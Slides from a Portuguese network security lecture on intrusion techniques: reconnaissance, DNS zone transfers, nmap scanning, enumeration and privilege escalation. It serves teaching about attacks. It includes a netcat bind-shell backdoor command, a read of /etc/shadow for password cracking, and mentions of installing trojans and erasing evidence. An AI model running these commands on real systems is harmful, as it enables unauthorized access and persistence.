Aula 04
Aula 04
Aula 04
Agenda de Aula
• Conhecendo o inimigo
• Anatomia de um ataque
• Footprint
• Fingerprint
• Enumeração
Segurança de Redes
Técnicas de invasão
• Porque aprender a atacar?
– Defender-se de quem?
– Do que?
– Como?
• Notoriedade
• Diversão
• Espionagem http://anchisesbr.blogspot.com.br/2012/11/seguranca-espionagem-industrial.html?spref=tw
• Investigação legal
• Vingança
• Estagiários
• Prestadores de serviços
• Agentes da lei
• Experiência
• Criatividade
Segurança de Redes
Técnicas de invasão
Origem de um ataque
Segurança de Redes
Técnicas de invasão
Quem são os atacantes
• Script Kiddies
• Crackers
• Hackers
Segurança de Redes
Técnicas de invasão
Script Kiddies
Segurança de Redes
Técnicas de invasão
Script Kiddies
Segurança de Redes
Técnicas de invasão
Características de um invasor
Segurança de Redes
Anatomia de um ataque
• O primeiro passo para entender um ataque é
entender sua anatomia, a forma como é
constituído.
• Basicamente
– Footprint: levantamento de informações
– Fingerprint: saber qual o S.O., quais portas, etc
– Enumeração: selecionar o que pode servir ou não
para um ataque
– Ataque propriamente dito
Segurança de Redes
Anatomia de um ataque
• Numa visão geral Testar as ferramentas
em ambiente controlado
Fontes públicas
de informação
Privilégios de acesso,
eliminar indícios,
garantir retorno
Segurança de Redes
Anatomia de um ataque
• Ataque de Script Kid
Escolha do Levantar Scanners de portas e
alvo informações do alvo vulnerabilidades, varredura
de hosts, identificação de
vulnerabilidades e confs.
N padrões
Segurança de Redes
Anatomia de um ataque
• Ataque de Hacker/Cracker
Footprint
Engenharia Levantar
social informações públicas Fingerprint
e de infraestrutura
N
Enumerar serviços
Invasão bem
sucedida.
disponíveis
Acesso não Enumeração de falhas,
autorizado
com privilégios
configurações padrões e
no alvo exploits para os serviços Varredura de
encontrados vulnerabilidades
S
Instala trojan
Destruição de Um host é violado e será
Instala backdoor
evidências e obtenção utilizado para atacar outros
Instala logclean de retorno facilitado alvos
Segurança de Redes
Anatomia de um ataque
• Ataque de cracker
Segurança de Redes
Portas de comunicação
• Cada processo pode utilizar mais de uma porta
simultaneamente (entrada, saída) , mas, em um
dado instante, uma porta só pode ser usada por
uma aplicação.
Segurança de Redes
Portas de comunicação
• A forma de utilização de portas mostra uma
distinção entre a parte cliente e a parte
servidora de uma aplicação TCP/ IP.
Segurança de Redes
Portas de comunicação
• A aplicação cliente pode utilizar um número de porta
qualquer.
Segurança de Redes
Footprint - Conceito
• Busca detalhada de informações sobre o alvo
para intrusão.
Segurança de Redes
Footprint - Conceito
• Um footprint dura enquanto for necessário.
Segurança de Redes
Footprint - Objetivos
• Levantar informações sobre o domínio
– Nomes de domínios
– Responsáveis
– Servidores
• Descoberta de subredes
• Topologia da rede
Segurança de Redes
Footprint - Objetivos
• Contas de e-mail, FTP e outros serviços
• Endereços de e-mails
• Arin - https://www.arin.net/
• http://networking.ringofsaturn.com/Tools/whois.php
• http://whois.net/
• http://whois.domaintools.com/
Segurança de Redes
Footprint – Levantar info. domínio
Comando host
• Descobrindo IPs dos servidores de nome
– host –t ns google.com
Segurança de Redes
Footprint – Levantar info. domínio
• Verificando qualquer servidor
– host –t any google.com
Segurança de Redes
Footprint – Levantar info. domínio
Comando Dig – utilitário para consultas DNS
Segurança de Redes
Footprint – Levantar info. domínio
• Buscando informações sobre os servidores de e-mail
– dig –t mx google.com
Segurança de Redes
Footprint – Levantar info. domínio
O comando Dig também faz transferências de Zonas de
DNS: dig @<srv_DNS> <dominio> axfr
1 # dig @dns.dom.com.br dom.com.br axfr
2 ; <<>> DiG 9.1.3 <<>> @dns.dom.com.br dom.com.br axfr
3 ;; global options: printcmd
4 dom.com.br. 86400 IN NS dns.dom.com.br.
5 dom.com.br. 86400 IN NS dns2.dom.com.br.
6 dom.com.br. 86400 IN NS gw.dom.com.br.
7 dom.com.br. 86400 IN MX 10 mail.dom.com.br.
8 mail.dom.com.br. 86400 IN CNAME svr1.dom.com.br.
9 ftp.dom.com.br. 86400 IN CNAME svr1.dom.com.br.
...
10 svr1.dom.com.br. 86400 IN A 164.17.100.20
11 svr1.dom.com.br. 86400 IN HINFO "Pentium III 1GHz"
"Linux Red Hat 6.2"
...
12 fw.dom.com.br. 86400 IN A 164.17.100.1
13 fw.dom.com.br. 86400 IN HINFO "Pentium II 400MHz"
"Linux Red Hat 6.2"
...
Segurança de Redes
Footprint – Levantar info. domínio
• Comandos traceroute (linux) e tracert (windows)
• EX:
#traceroute alvo.sub.dom.br
1 dial.domX.com.br (210.90.136.14) 116.963 ms 119.668 ms 130.050 ms
2 fw.domX.com.br (210.90.136.1) 119.751 ms 119.800 ms 119.907 ms
3 atm.domY.com.br (201.100.129.132) 119.875 ms 119.809 ms 119.917 ms
4 gw.dom.br (201.100.129.4) 119.981 ms 129.798 ms 119.916 ms
5 gw.sub.dom.br (154.34.4.3) 129.896 ms 139.799 ms 129.925 ms
6 154.34.12.2 (154.34.12.2) 129.912 ms 139.797 ms 129.968 ms
7 alvo.sub.dom.br (154.34.8.66) 129.781 ms 139.886 ms 139.868 ms
Segurança de Redes
Footprint – Levantar info. domínio
• Comando Hping - Usado entre outras coisas para:
Segurança de Redes
Footprint – Levantar info. domínio
• Troca de e-mails (qualquer leitor de e-mail)
• Informações:
• Nome e versão do servidor SMTP
• Nome e versão do cliente de e-mail do usuário
• Plataformas (servidor e usuário)
• Nomes e endereços de servidores
• Onde procurar
• Cabeçalhos da mensagem
• Como fazer
• Enviar e-mails para usuários internos (pedindo que respondam)
• Enviar e-mails para usuários inexistentes
Segurança de Redes
Footprint – Levantar info. domínio
Segurança de Redes
Footprint – Leitura de banners
• Tarefa de ler os banners que identificam serviços para identificar
versões de programas, endereços, etc.
Segurança de Redes
Footprint – Leitura de banners
Segurança de Redes
Footprint – Leitura de banners
• Comando Netcat
Segurança de Redes
Fingerprint - Conceito
Segurança de Redes
Fingerprint - Conceito
• NMAP - Network Mapper
Segurança de Redes
Fingerprint - NMAP
• Scanners de porta: NMAP (intrusivo)
Segurança de Redes
Fingerprint - Conceito
• Descoberta de Hosts | Varredura de portas | Detecção de O.S.
Segurança de Redes
Fingerprint - NMAP
• Descoberta de hosts:
• -sL: “List Scan” -> apenas lista os alvos passados como parâmetro. Não realiza
uma varredura ativa.
• -PN: “No Ping” -> trata todos os hosts como “on-line”, pulando a fase de
descoberta completamente.
• -PR: “ARP Ping” -> método de descoberta de rede padrão utilizado pelo
nmap quando o alvo encontra-se na mesma rede.
• -PE: “ICMP Echo Ping” -> método de descoberta de rede padrão utilizado
pelo nmap quando o alvo encontra-se numa rede externa.
• -PS: “TCP SYN Ping” -> método de descoberta útil para hosts que não
respondem ICMP.
• -PU: “UDP Ping” -> método para descobrir hosts usando UDP.
Segurança de Redes
Fingerprint - NMAP
• Varredura de portas
• -sS: “TCP SYN Scan” -> é o método de varredura mais popular. Envia pacotes TCP com o
flag SYN ligado para as portas alvo:
» Se receber um SYN-ACK: porta aberta
» Se receber um RST: porta fechada
» Se não receber nada: porta filtrada
• -sT: “TCP CONNECT Scan” -> mais lento e menos furtivo, pois a conexão é de fato
estabelecida através do método “connect”. Porém pode ser executada por um usuário sem
privilégios administrativos no sistema.
• -sA: “TCP ACK Scan”-> Envia pacotes TCP com a flag ACK ativa.
• -sN: “NULL Scan” -> Envia pacotes TCP sem nenhuma flag ativa.
• -sF: “TCP FIN Scan” -> Envia pacotes TCP com a flag FIN ativa.
• -sX: “TCP XMAS Scan” -> Envia pacotes TCP com as flags FIN, PSH e URG ativas.
• As opções –sA, -sN, -sF e –sX geralmente são executadas apenas para agregar informações
a outras varreduras já executadas, pois nem sempre oferecem resultados confiáveis (pois
nem todos os sistemas implementam a pilha TCP/IP de acordo com a RFC 793).
Segurança de Redes
Fingerprint - NMAP
• Detecção de serviços e S.O.
Segurança de Redes
Fingerprint - NMAP
• Exemplo com comando: nmap –sS –sV –O <IP>
Segurança de Redes
Fingerprint - NMAP
• Mais scanners de porta:
• NetStat (Windows)
• Netcat
• Nmap
• Amap (ideal para leitura de banners)
• Blaster
• Hping2, Hping3
Segurança de Redes
Enumeração
Segurança de Redes
Enumeração
• Enumeração de serviços encontrados para escolha de
onde concentrar esforços.
• HTTP
• SSH
• SMTP/POP
• FTP
• VPN
• MYSQL
Segurança de Redes
Enumeração
• Exemplo de scanner de vulnerabilidade: Nessus
http://www.tenable.com/products/nessus
Segurança de Redes
Enumeração
• Tem suporte a Administração Remota
Segurança de Redes
Mais sobre invasões
Segurança de Redes
Invasões
• Conheço os serviços, e agora????
• http://www.backtrack-linux.org/
• http://packetstormsecurity.org/
• http://www.phrack.com/
• http://www.securityfocus.com/
• http://www.exploit-db.com
Segurança de Redes
Invasões
• Uma vez que se tem acesso, a ideia é escalar privilégios no
sistema.
Segurança de Redes
Invasões
• Antigamente as senhas no Linux eram armazenadas no arquivo
/etc/passwd que possuía o formato:
carlos:$1$3ZkVpbv6$z.T9d907rVyIcxUFy3wwk:1014:1014:Usuário contabil:/home/carlos/:/bin/bash
carlos:x:1014:1014:Usuário contabil:/home/carlos/:/bin/bash
Segurança de Redes
Invasões
Exemplo:
# cat /etc/shadow
carlos:$1$3ZkVpbv6$z.T9d907rVyIcxUFy3wwk.:12643:0:99999:7:::
Segurança de Redes
Invasões
cd /pentest/passwords/john
Segurança de Redes
Invasões
• Backdoors: garantir acessos futuros
• Ferramenta Netcat
• servidor: nc -l -p 80 -e /bin/bash
• cliente: nc servidor 80
Segurança de Redes
Invasões
• Sempre bom lembrar que o invasor deve estar
preparado para:
– Imprevistos.
– Ser detectado.
– Repetir etapas.
Segurança de Redes
Invasões
• Contramedidas